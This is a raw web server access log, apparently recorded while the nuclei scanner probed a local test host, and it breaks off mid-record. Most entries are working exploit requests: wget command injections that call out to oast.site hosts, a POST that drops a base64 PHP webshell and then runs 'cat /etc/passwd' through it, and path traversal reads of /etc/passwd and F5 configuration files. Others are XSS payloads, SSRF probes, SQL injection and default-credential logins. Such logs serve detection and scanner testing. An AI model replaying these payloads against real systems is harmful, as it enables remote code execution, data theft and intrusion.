"18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=command&command=set_city_timezone&value=$(wget%20http://ca281d8smpvb9r2g07h09mr8z1xfdr7go.oast.site)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/sharelinks/1.0/link?url=https://ca281d8smpvb9r2g07h0gabgtnic98jr8.oast.site/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/29K9NHg1xa1jrW64Oxs6wrwkKM3.svg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapi/v1/system/accountmanage/account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vkd/GetWelcomeScreen.event HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"url=https://127.0.0.1:443@ca281d8smpvb9r2g07h0xdhh3rjg7dumu.oast.site\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugins/servlet/gadgets/makeRequest HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"ip=127.0.0.1|echo \x22PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K\x22|base64 -d > poc.php&mac=00-00","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /guest_auth/guestIsUp.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///////../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://ca281d8smpvb9r2g07h0gmip4fzskbsmh.oast.site`;busybox wget http://ca281d8smpvb9r2g07h0rq9f48htutd7c.oast.site&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/tmindex.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /guest_auth/guestIsUp.php","status":"400","body_bytes_sents":"154","req_time":"0.037","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clientaccesspolicy.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\x22>\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static///////../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://ca281d8smpvb9r2g07h0mnbm39wwdrqz3.oast.site`;wget http://ca281d8smpvb9r2g07h04h5futyhj1wpk.oast.site&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"user=admin&passwd=admin&challengePwd=&ok=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uir//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationserverservlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/CI.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///../app.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proxy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", 